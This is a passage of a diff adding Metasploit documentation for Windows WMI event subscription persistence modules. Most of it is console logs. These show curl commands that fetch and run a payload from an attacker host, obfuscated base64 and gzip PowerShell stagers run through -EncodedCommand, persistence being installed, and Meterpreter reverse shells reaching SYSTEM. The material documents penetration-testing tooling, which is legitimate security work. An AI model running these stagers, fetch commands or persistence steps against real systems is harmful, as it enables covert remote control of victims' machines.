7 c L a h X x d V z x o H n 0 n x 4 h l / R v P j M 3 P f W z W l L 4 u l + q X i u O E e 8 L b 4 b e u 4 A L w P X 7 W f u u W V e H V k H P I A j z 1 + 6 9 x b 9 P H C + c v O w 5 9 F 9 m p e Z S 9 o 0 Z 8 2 s + / f E 8 a v 7 v P t x C Z 7 X 4 F F 5 t Z 4 / x H V + x F H i / 2 v r 8 A { 1 } O 7 v i u 0 L n M C ' + ' 7 Z z T 1 5 n 3 H O D P h 5 Y L 5 1 b t 3 T n z T p + n 6 O L k j / W q V O / A w T 0 { 1 } P l ' + ' h 0 a R 5 S n 4 N z A c d / { 1 } 7 f { 1 } r k I P k H 3 p b 7 X 8 x z m u O z o M 2 f 4 s Y E n d P / G c ' + ' 9 A Y X v C 5 c + b G f k ' + ' z 6 W L w ' + ' / Y e 4 T f y 3 a N B d 6 7 o J v j Y 8 ' + ' d O t / z k e v O O M A v z 2 l / { 1 } J M 5 / V P 9 p e 7 m 3 { 1 } L / F M 9 N k / T w i n 7 D n A p v 6 p 4 y J B z M q D / l w X w z 9 O + H e r Z e L O D n k f F 2 0 f H O 2 T F e 5 ' + ' K s 9 4 v w i v S M Q P 8 e 1 1 + H h D n s W 1 O u { 1 } 0 / / 0 p / + Z Q 2 r w e M o 9 N x 2 P T j u + 3 J A v d D V 6 c + h 5 0 v r C O o X 3 H P K h e B X Y q z w c + q / w 8 N r 1 9 T N 4 c k v f G B 3 0 Q t d / 6 E / o 5 K T X n 7 h / 5 f x q H i J O 7 E c f a N 3 c / Y m + h B 7 M s e c x 9 Z f j e V + J 7 9 J 6 a { 0 } w d R u s 9 6 i H / l O ' + ' Y i 4 V y 4 c F + o m 4 S 3 L X j n v Y A + O v D 8 + J L i k Z 2 k e R t c 2 / 8 f 8 F r h u q / S u 5 X 8 X c X E t 5 M 2 v X t 5 v l V + r a N S 3 j w n z G L S t Z 5 n h m V X 5 y H V B 3 q 3 u 6 c M K S 7 H 9 w 3 P a / A B P D v u 1 p u H 1 v x e u B + N q Z N l 1 8 + j e Q 2 e t p 4 T P 8 D L n i d y 9 O I 7 X q Q H a + t X 6 w v r j L p 7 j z E O 0 O X E Y { 0 } T f C O 6 z M + u D F t 4 e Y O c E H T S q u / e I X j c n M v + j T 9 A z 6 B P m I 8 V P f L 5 s x b t + b 9 Q 8 I j 9 S 3 y 8 6 P V O h n 1 x 3 G + r O / f F o 7 3 n 3 H r P r 3 r W e 4 J c 1 O k H n L F z 3 F f m / Q E + v 6 I f W 1 9 S 3 3 7 E e q f O S e c b v c J n n W O s 1 2 b W w H j 7 E O Y L z M f w 6 Y / / I e v q s 0 z H + V l F x S u 8 A v v / K + i C C J / e P q e f j B v v u u 7 q 9 s M 7 C P t 5 J 0 E P 9 r i 5 0 T { 1 } X + 5 f e C d 6 X L T 9 3 8 X 7 / z p u d z 4 / H F f M j 6 F P 8 7 4 4 F 6 O 7 4 f + D 0 r h 2 d r 9 0 n P D c b b A v w p 7 y X 1 L j t q 7 h u h M 9 I 8 N O W e Y e z s R d c w D 1 T o s n u / 0 3 X 5 3 L T J z h v X D + 8 2 i k + / 6 e Z K 9 5 N v a W 6 T X e k 9 x f X o f j O E V + G Z H r x z k v Q m O p z 5 h z h E e O e B 9 Z X 7 s N + J 3 r r 7 r d c r + H h k / f b S z b f W 7 c u Y 3 u v S v G w + P W H 9 F e 9 k v M N Q x 4 p z { 1 } e 5 T 3 1 r D / / Q N n 2 N c 7 J { 1 } b ' + ' h O / M / T 0 w p 6 q u Y v i B 3 e I 3 / / 8 K / Z r v + P + z 5 w 3 r j R 3 r v v G 9 C t m G O t h i t / G o e y / V 9 + C z S + s A v y v X 7 o M l 8 T { 0 } ' + ' O N / S B / / d 3 5 W l j H V G G 3 2 O Q 3 / b / n j r a 4 N / I d X 3 v u b Z N 9 s i u P + D p F e / 5 i b 8 9 Z 2 y o + 8 v m a P c K H u W d v w 2 N 5 7 u Y L e C F B e / f A 7 9 D t / w + a 8 M / P / z y l w / l 8 / b p w 9 / + C 8 Y Z D P V 9 G A A A ' ) - f ' U ' , ' g ' ) ) ) ) , [ S y s t e m . I O . C o m p r e s s i o n . C o m p r e s s i o n M o d e ] : : D e c o m p r e s s ) ) ) . R e a d T o E n d ( ) ) )  -InputFormat None +[+] Payload successfully staged. +[+] Final command JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEwAZwBPAEgAVwBrAEMAQQA0ACcAKwAnADIATwBRAFEAdQBDAFEAQgBTAEUALwAwAHEASABEAFoAWABTAFUAMwBRAHcATwBsAFIAbwBlAEMAcgBhAGoARQBBAGkAMQAnACsAJwBCADcAdABwAHIANgBOADMAVQBXAFUANwBMACsAMwBVAGsASABIADMAbQBsADQATQAzAHcAegBTAFkAQQAxAGwAdwBJAHIAUQBIADMAeQAvAFQAWABvAG4AOABjAGgAbABUAHoATgBTAGwAQwAyAEYAUwB1AFEAbAB1AE0AVgAwAEsAcQBPAFEAZwBtADUAZABxAG0AVwBIAEsAKwBEAHEARgAnACsAJwAxAHMAZAB5AEUAOQBkAGwAUgBJADcAVwA2AHkAbQAvAEcANgA0AFkATQB3AE4AcABvAG4ALwA5AEIAdABjAGgANQAvACsATQA5AFoAaABMAFUAbwB3AEEAMgBhAHUAdwBTAGwAdQBNAEEAQgBzAFkAbQBkADcASwBIAFIAWABvAEMANQB1AEoAaABLAFEANABxAFIARwB3ADIAZQBJAHsAMgB9ADUAbgA5AEsARwBWAHcAQgBwAGsAWAB4AFIASwBVAFMAMQBUAEIAZAB7ADAAfQBKADEAMgBYAE0ANgBlADgARgB4ADUATABEAHoAKwA4AEEAQQBBAEEAewAxAH0AJwApAC0AZgAnAFAAJwAsACcAPQAnACwAJwBiACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEwAZwBPAEgAVwBrAEMAQQA0ACcAKwAnADIATwBRAFEAdQBDAFEAQgBTAEUALwAwAHEASABEAFoAWABTAFUAMwBRAHcATwBsAFIAbwBlAEMAcgBhAGoARQBBAGkAMQAnACsAJwBCADcAdABwAHIANgBOADMAVQBXAFUANwBMACsAMwBVAGsASABIADMAbQBsADQATQAzAHcAegBTAFkAQQAxAGwAdwBJAHIAUQBIADMAeQAvAFQAWABvAG4AOABjAGgAbABUAHoATgBTAGwAQwAyAEYAUwB1AFEAbAB1AE0AVgAwAEsAcQBPAFEAZwBtADUAZABxAG0AVwBIAEsAKwBEAHEARgAnACsAJwAxAHMAZAB5AEUAOQBkAGwAUgBJADcAVwA2AHkAbQAvAEcANgA0AFkATQB3AE4AcABvAG4ALwA5AEIAdABjAGgANQAvACsATQA5AFoAaABMAFUAbwB3AEEAMgBhAHUAdwBTAGwAdQBNAEEAQgBzAFkAbQBkADcASwBIAFIAWABvAEMANQB1AEoAaABLAFEANABxAFIARwB3ADIAZQBJAHsAMgB9ADUAbgA5AEsARwBWAHcAQgBwAGsAWAB4AFIASwBVAFMAMQBUAEIAZAB7ADAAfQBKADEAMgBYAE0ANgBlADgARgB4ADUATABEAHoAKwA4AEEAQQBBAEEAewAxAH0AJwApAC0AZgAnAFAAJwAsACcAPQAnACwAJwBiACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= -InputFormat None +[+] Cleaning up 496 +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEwAcwBPAEgAVwBrAEMAQQA0AHQAMgB7ADEAfQBTAHYATABMAE0AcgBQAHkAMAAzAE4ASwAnACsAJwA0AG0AMQBzAG4ASgBQAEwAVQBFAFMAQwBFAHMAcwB5AGsAeABNAHkAawBrAHQAMQBsAEEAUABMAFUANAB0AFUAdABmAFUAeQAwADYAdABMAEsANABKAFQAcwAxAEoAVABTADcAUgBEAFMANABwAHkAJwArACcAcwB4AEwAVgAvAEMAcwB7ADAAfQBBAHcASQBjAGcAdQBPAHEARgBHAHQAagBrAFkAMQBMAEIAaQByAFkAUgBvAHEAOABUAG8AcQBlAGEAVQA1AE8AVABwAFEAUQAyAHMAQgBqAHIAeQBZAFYASQBRAEEAQQBBAEEAPQAnACkALQBmACcAZAAnACwAJwB6ACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwBhAFMAVwBPAFQAVABhAHAAJwA7AA== -InputFormat None +[+] Persistence installed! Call a shell using "smbclient \\\\2.2.2.2\\C$ -U BOB " +[+] or +[+] use auxiliary/scanner/smb/smb_login +[+] run SMBUser=BOB SMBPass= RHOSTS=2.2.2.2 +[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251118.2636/WIN10PROLICENSE_20251118.2636.rc +``` + +Persistence Trigger + +``` +msf exploit(windows/persistence/wmi/wmi_event_subscription_event_log) > use auxiliary/scanner/smb/smb_login +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp +[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session +msf auxiliary(scanner/smb/smb_login) > run SMBUser=BOB SMBPass=mess_with_the_best_die_like_the_rest RHOSTS=2.2.2.2 +[*] 2.2.2.2:445 - 2.2.2.2:445 - Starting SMB login bruteforce +[-] 2.2.2.2:445 - 2.2.2.2:445 - Failed: '.\BOB:mess_with_the_best_die_like_the_rest', +[*] 2.2.2.2:445 - Scanned 1 of 1 hosts (100% complete) +[*] 2.2.2.2:445 - Bruteforce completed, 0 credentials were successful. +[*] 2.2.2.2:445 - You can open an SMB session with these credentials and CreateSession set to true +[*] Auxiliary module execution completed +msf auxiliary(scanner/smb/smb_login) > +[*] Sending stage (188998 bytes) to 2.2.2.2 +[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:50188) at 2025-11-18 19:28:43 -0500 + +msf auxiliary(scanner/smb/smb_login) > sessions -i 2 +[*] Starting interaction with 2... + +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > +``` diff --git a/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_interval.md b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_interval.md new file mode 100644 index 0000000000000..0cc631315d3ef --- /dev/null +++ b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_interval.md @@ -0,0 +1,137 @@ +## Vulnerable Application + +This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter +that triggers the payload after the specified CALLBACK_INTERVAL. + +If the persistence is not installed, it will keep triggering payloads to spawn. + +Additionally a custom command can be specified to run once the trigger is +activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a +high integrity process. It is also recommended to use staged payloads due to powershell script length limitations. + +## Verification Steps + +1. Start msfconsole +2. Get a shell on Windows +3. Do: `use exploit/windows/persistence/wmic/wmi_event_subscription_interval` +4. Do: `set session #` +5. Do: `run` +6. Wait +7. You should get a shell. + +## Options + +### CALLBACK_INTERVAL + +Time between callbacks (In milliseconds). Default: `1_800_000` which is 30 minutes + +### CLASSNAME + +WMI event class name. Default: `UPDATER` + +## Scenarios + +### Windows 10 1909 (10.0 Build 18363) + +Original Shell + +``` +resource (/root/.msf4/msfconsole.rc)> setg verbose true +verbose => true +resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 +lhost => 1.1.1.1 +resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp +payload => cmd/linux/http/x64/meterpreter/reverse_tcp +resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp +resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL +fetch_command => CURL +resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true +fetch_pipe => true +resource (/root/.msf4/msfconsole.rc)> set lport 4450 +lport => 4450 +resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3 +FETCH_URIPATH => w3 +resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB +FETCH_FILENAME => mkaKJBzbDB +resource (/root/.msf4/msfconsole.rc)> to_handler +[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe + +[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd +[*] Payload Handler Started as Job 0 +[*] Fetch handler listening on 1.1.1.1:8080 +[*] HTTP server started +[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg +[*] Adding resource /w3 +[*] Started reverse TCP handler on 1.1.1.1:4450 +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > +[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg +[*] Sending payload to 2.2.2.2 (curl/7.79.1) +[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:50187) at 2025-11-18 19:25:49 -0500 + +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1 +[*] Starting interaction with 1... + +meterpreter > getuid +Server username: WIN10PROLICENSE\windows +meterpreter > sysinfo +Computer : WIN10PROLICENSE +OS : Windows 10 1909 (10.0 Build 18363). +Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x64/windows +meterpreter > background +[*] Backgrounding session 1... +``` + +Persistence Install + +``` +use exploit/windows/persistence/wmi/wmi_event_subscription_interval +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp +msf exploit(windows/persistence/wmi/wmi_event_subscription_interval) > set session 1 +session => 1 +msf exploit(windows/persistence/wmi/wmi_event_subscription_interval) > set CALLBACK_INTERVAL 60000 +CALLBACK_INTERVAL => 60000 +msf exploit(windows/persistence/wmi/wmi_event_subscription_interval) > exploit +[-] Exploit failed: cmd/linux/http/x64/meterpreter/reverse_tcp is not a compatible payload. +[*] Exploit completed, but no session was created. +msf exploit(windows/persistence/wmi/wmi_event_subscription_interval) > set payload windows/meterpreter/reverse_tcp +payload => windows/meterpreter/reverse_tcp +msf exploit(windows/persistence/wmi/wmi_event_subscription_interval) > run +[*] Exploit running as background job 1. +[*] Exploit completed, but no session was created. + +[*] Started reverse TCP handler on 2.2.2.2:4444 +msf exploit(windows/persistence/wmi/wmi_event_subscription_interval) > [*] Installing Persistence... +[*] Powershell command length: 6851 +[-] Compressed size: 14384 +[-] Compressed size may cause command to exceed cmd.exe's 8kB character limit. +[+] Launching stager: +[+] - Bytes remaining: 14384 +[+] EXECUTING: +powershell.exe -EncodedCommand & ( [ s c r i p t b l o c k ] : : c r e a t e ( ( N e w - O b j e c t   S y s t e m . I O . S t r e a m R e a d e r ( N e w - O b j e c t   S y s t e m . I O . C o m p r e s s i o n . G z i p S t r e a m ( ( N e w - O b j e c t   S y s t e m . I O . M e m o r y S t r e a m ( , [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ( ( ' H 4 s I A L q m H 2 k { 2 } A 6 W Z S 3 f a 2 p a F / 0 r 1 U j X G b R A / c n N v b 8 s S g m M E E S B ' + ' 8 R I 1 q g O A { 1 } { 2 } U 7 I s R 3 L 9 q + v + c 0 t S E Z 1 y x 0 N 5 P 1 Y z 7 n m W v r v 7 P v z l 4 f j 9 2 / 7 7 0 / / 8 + 9 / L / Z P v 7 1 Y b R 6 + b L b 3 + / 9 8 N 9 D f + + q v 5 6 f N M c v f / e P d H 2 0 4 h u F j a L r k a x i N w 6 Z M u j A q Q 9 0 m j y H / G O { 1 } u e Q j D Q Z i 1 4 U P I i 9 { 2 } 0 y X 3 I s 7 A L e t 6 0 4 T Y k s 5 B X Y d e F p 5 B 9 Z N / f / N a + Q b g ' + ' J { 1 } e q S 6 z A q 4 v p 8 E { 2 } Z t 8 g f r 9 F x y z + m 8 b Z k s v K 9 M D j w b 5 M q u w r p M L s P N I { 2 } y 7 5 E v I j / z + y r 5 x Y P 8 B u Q e s 3 5 b h Z 8 g O W s e z { 2 } N s u e Q q j E M / X / V r 3 ' + ' A 3 2 2 L f 9 v w r 7 V 7 5 H l G 6 { 2 } 3 z v 2 M f L f h / 3 P v g H V P 3 K N 7 r 8 ' + ' P Q e r / 2 e j 1 h r 0 l ' + ' I t r z f l 8 k b 5 3 n 9 z V U { 1 } u + Q 5 5 F d h Z 3 n H 7 N u F 9 { 2 } i 7 J z m / r U 8 2 5 p w 3 z p u 2 Y f D r / I P 0 S r 5 H f 0 j + m y Y s g v 4 v v f d d e A m j Q S j L p A g j 2 3 k c U v m 5 S 9 K Q Z Z z z G { 1 } b H + L y x / 6 6 5 5 y 5 w b x 1 u u 3 A d 8 v p 8 j u x 1 G Y Y N z 5 z z 1 1 3 i / c s S e X g f H r { 2 } / 7 9 M 9 2 v f K v q Z M h i E v s Z v s w v 0 6 d / Q Y i j L 5 V x i 1 Y Y 2 e w 4 x 1 / w x p F v 4 q k z X 7 m 6 B 9 s p P ' + ' 8 s O E e 7 f + E v l P O z S 3 f c 0 i r U H T y X 9 a G W d D 5 0 l / v v + P n a U ' + ' d c l W E b i M e P 6 P 1 P z v 2 r 1 P 9 v H s M f x L f i 8 a ' + ' 6 V 3 G k T N m 3 y k 3 O q k F y E r O R Z W k / s k R b c 2 3 G / / P c B e W S n N f v W 5 I v s t Q p B f m 3 { 2 } r N Q 5 8 s + 6 l N 1 y 5 9 M G u + 4 4 P w 3 I + T 6 M j t z 3 g n 8 V j z V 5 U G B / n b M M 0 ' + ' i e V P m W 4 / N 2 P u 4 A / { 2 } t Z f h G G p 8 / R + 2 M p u e i / 9 T v b W u l f r 3 c r f I 9 v t g v N n 4 a z 3 N + J ' + ' 6 6 v g e h z n x p / 0 T + 6 W V P X h f Y / d X 8 s L 6 y M 6 S + x P 6 { 2 } S c u O G f R { 1 } X c m e y e O t z X y D { 1 } 9 R 7 2 F / / r { 2 } O 8 Z Q e s P 9 n 9 k n P J 3 7 L v 9 + 4 t y A u k S O c / K P z l W e 2 m / J i i 5 2 0 b h W S E f 6 Z G l f G k l f 5 k t X Y 9 R Q 3 H 3 g q ' + ' n h 2 3 S / y { 1 } + N G + A 3 6 6 x Q 6 y 7 4 Z 4 j / d / J 5 8 k 3 x f k v c U u i s + y V Z 5 J T u F Y Q R y s ' + ' j W t t K I L i Z O Q 4 e + j P G / T x + 4 D 8 O + Q e B v x 2 R V w 1 5 G v 2 S B x N k F f x 8 4 Y e U + Q c 4 W + d J / / J z h X v l U 8 H 7 F 2 3 4 a K P V + F Y h b 9 f + v g s f A 9 5 L z v U n e y t 9 c r r b 9 h p W S q u 0 h q 9 ' + ' L t F f d v { 1 } e h { 1 } d w B 6 6 n x { 1 } s / i R / J 8 w H / O 7 6 G 1 m M a s i P 7 n v G v f s + M k 8 7 D A 3 j s + F q R / y P 8 K b k V X y v H r f A T v e S v G e c q 3 m r i U u u m 5 d m ' + ' f n 4 0 v J f l U 4 e 9 X c G K O / 3 P L + x k 8 X t { 1 } v x { 1 } c r 3 q / R K 3 P 8 j j i 3 K M N 7 / L k l / u N 5 B f { 1 } 1 Z Y x T r c / 7 f P r K v q r V O S n 5 k W Q x n z i P / N Y 5 8 s / c / q z B 6 x 8 h J Z + I t 4 z z c / J U 9 n p z f Q j J E b 8 2 I T i e l B 8 j f g t 3 P v R 5 9 B m 5 Z 9 Q 5 4 w D 3 D I i / a / w m e 2 + I y 8 Z 5 V / ' + ' D + A T v M f J 7 i t N V + x c G 0 l D z S a 4 e c k l f 2 P S J P 4 / w P M a / A O + w u O a T P { 2 } L v v u U d 5 I D l d x 7 X + P f G 1 b 4 W P k t N 2 k r 2 r U v u U j x v w I u K K 8 U L 5 / K W 3 g / N V ' + ' d ' + ' k i t f 6 n n { 2 } U / R u 6 T e d 7 K r 1 i m u d 1 1 y 5 T p e R l y W X I u + / l k f 4 e 6 { 2 } 5 6 J V X E Y c / I S 9 t s T X 6 d z U + z 4 7 v 1 p w 1 f J e 2 O 7 g h O 6 L e F i Q p 2 / U i S n 1 { 2 } z n R V + 8 V / 5 ' + ' s + 3 y f E 8 4 Y 4 ' + ' O 5 0 P P 2 k V 5 6 r r i t 8 1 u F x 3 Z x w 8 4 r e V + Y D z K u X + N f Z I n S c z / L Q M 2 N 1 4 e + 3 7 w O H U 6 1 7 B 9 S l 5 P j T u H 8 1 v O v B 9 H O t q x J k F / l f e X B J / x { 1 } m s Q s 4 / 8 f f c 9 c s 4 e R f y R 8 5 5 4 7 5 b 8 l / y r 0 P M a + P w y P j 5 r 5 5 v 5 c a B U r y E e t m p X i r e t p a z 5 d w p 9 2 v f 3 8 j X U J / l 9 x V x q P N 1 z g 3 n L s l X 8 M E 4 0 W D H A j v J r i / Y W X 5 8 x M 9 7 6 p 3 u l V w l c b g { 2 } v 8 D p M s q p v L u L 9 q ' + ' L + H Y n r e / T b E q / { 2 } E 9 t P d U t 5 M i Y P l D 8 v j t 9 T 3 T I f f M R v A + w 1 6 / 1 a m 1 c 0 1 O m T 3 2 r y e 4 v 9 d Z 7 s V { 1 } N / U + S E r 2 D n { 1 } X n d A P v 8 w X 7 F w 9 J y H 5 D / g N + c f 9 p f 2 { 1 } 4 f u a / q 6 3 A N r p j 3 K Y + n j g / ' + ' j 0 W P P j 1 / ' + ' N 9 + B Z 5 D 1 5 m D v / v n B f 4 7 i 0 H 0 7 y u r 7 q v m f s s k I + e B y 4 K P s r z { 1 } 1 3 U 9 e p E P F L c q 5 4 r / p S u x 6 L l x J P G X w E X h D I 4 9 P 5 4 5 4 f 2 X 9 7 8 z H y D 5 y D X 4 I z v + y w J { 1 } 9 y 8 6 p r / B X 5 n O v c Z 3 B j y e / c 8 X d N n s t f f 7 s / a B W v E d d f u b c B p 2 N 9 q s H f V R t 5 6 h p + O r I e 8 + i P 5 { 2 } H y S c 6 3 / 4 / Y f W H 8 r 6 g X b 6 x b d R G / 6 5 K 8 a e g r r s H 9 y j w 3 { 2 } 3 P w Q X 6 f u D 5 9 h D f f c 9 + E v N a 5 8 z L q 0 7 h O D m K d k P 5 b e E h q n P x K X q i u T Z B / ' + ' j n 1 1 j + u ' + ' a c K U g z 6 j b H X H c 4 6 H s X T ' + ' j f S 3 { 2 } g i / V P e Q b f I u 7 0 X B { 1 } H w E H y w X F 3 ' + ' S / x u + j q 1 x w + j Y 6 z H 1 F 3 0 p 0 7 1 + G + c G Y L X 8 H R w J P K w p e v g A R y 5 7 O v { 2 } G / I r v y r y e d n X 3 W k X 4 / { 2 } ' + ' O e + k X W { 2 } 9 9 l / D N y N N r 8 i 3 K V R H v P z h H 5 9 3 H O E S + E x 8 H t / Q + h W f q f P ' + ' M + 7 r e ' + ' / L / p 8 3 k R c l d 2 y L u Z T a v t d Y M 8 Z u { 2 } Z / b v F j 1 t d t 4 d 0 W + + s c 2 e E n d l { 2 } e T K 1 3 i H y t g G 8 5 P + A t r u N X 6 L U 2 X z L / H L B / 6 X x x 3 b h A ' + ' z { 1 } X 5 e 6 A e ' + ' f c B u r s v S v 8 I v + n 1 L f k i P W + q V 3 t f g j n 5 v j A d j 4 s j 5 t 4 N / K x 8 r + I L 8 Y n + Q j z 3 / P u F U A a 4 { 1 } H p c 9 H u z A U f M 6 c O { 1 } q 6 q e 8 m V r O M T y 5 6 P n y n f l z n 8 d b / K / 1 M 3 { 2 } D / j p E X F M 8 T q i H t 6 5 X g X q 7 4 X 0 N L 8 D v 4 F T q 9 Q f r a Z 7 j O j U g r 7 b 0 N b n j N E N O x x + 8 A R 5 i 3 I J / S + 6 S f i a D V 7 h ' + ' e r d x n G v 9 L 9 F a c P I M D 8 y 7 i y Y Z 6 K X y 7 Q 2 7 t V 5 / 3 w 3 0 w f h d e O h 8 V 5 8 K B b + 7 n Q m I e X F B X X T e F B 5 L X O K l 9 c / d P A T 0 v u b 9 y 3 9 n H I f H q e l B H X F Y 9 i v 1 I Q 3 x c I N e u j X V 3 { 2 } U + i v w ' + ' i J + 6 2 p c W c c + x T F u f v S 0 7 k 3 x { 1 } 2 e v 2 L / D P z p c T T W 9 9 0 v 3 L 7 s + 7 8 r 9 + 1 9 H K y M R 0 f u v 7 O ' + ' f f / U t P 6 1 / ' + ' S B L 0 i X w 2 Q 4 4 f 1 P d 9 i P J s H I 9 Z z 5 P N 5 1 L 0 M g 8 S n q 2 I 8 6 H r 7 T 3 r J O / S / B A 8 A A d { 2 } 1 E / 4 d E u c L N t T H w 7 / G m N P 9 0 3 u { 2 } 2 W X q f k D d i { 2 } u m l h X Z P 8 V f Q f 9 l f u W c e z / U 8 u Z I m 8 B X 4 S f l 5 E ' + ' X 3 b n e t s T v F e t X 4 L z i Y N L z 9 S 3 7 w A X L X e G P { 2 } e u m 9 g u 4 h N 3 p l x R v 8 A v m F p n z N Y X n r e G P 4 { 2 } L 3 y { 1 } 4 l 9 l Z c { 2 } a c 8 H y n K 2 A f u q M v D L P L h M z + F X 1 { 2 } 3 j B N L ' + ' 9 N j S D 5 1 5 Y A E O P Z B H c 3 h x n J t 8 R Z 4 d c u T u 0 5 4 8 B 2 L O E P V 9 4 T k F J 1 x v 4 a d j 5 i v v e W 8 c T p 3 f G f r u 4 L n y g + L 9 1 v y K + c P 5 f v P n A X a a u z 9 8 j H y N u M D + v + G 8 f s + N s 7 b b R + R 6 3 + P w G 3 Z y X u F P 1 9 2 K f s R 4 W O M X 4 x Y 8 { 2 } 5 4 t / + S H a K / c f h h w n v z T Y Y 8 d c 7 j c 8 ' + ' f x g H g h e U O f I t 8 x 1 8 s / f + d O t 8 T m A B + Z 9 d + B e 5 r p v v u A 6 K 7 1 U f 7 q z 3 { 1 } q X q { 1 } x 1 f { 1 } 5 9 M u Z Z 8 J + M c 5 7 7 u p j 2 8 5 x L 1 w X 4 s / S c l Z G n O e 5 l p 8 r z E t f L S + T f Y t + R + 5 m B + R 5 z z N T / f 0 Y P y Z 9 Q j 6 Z l 5 F U L 8 E n P j f k d / R 3 1 7 P f 4 I S 4 8 H 8 t 7 3 J l Y H u w b + / Q / y V f h Y m Y c g ' + ' 0 d r 3 5 z + ' + ' R z h + q g 8 l 8 s t / u u / N + e f 4 q d H 3 P f ' + ' d P Q + w f 1 / S R 4 l v T M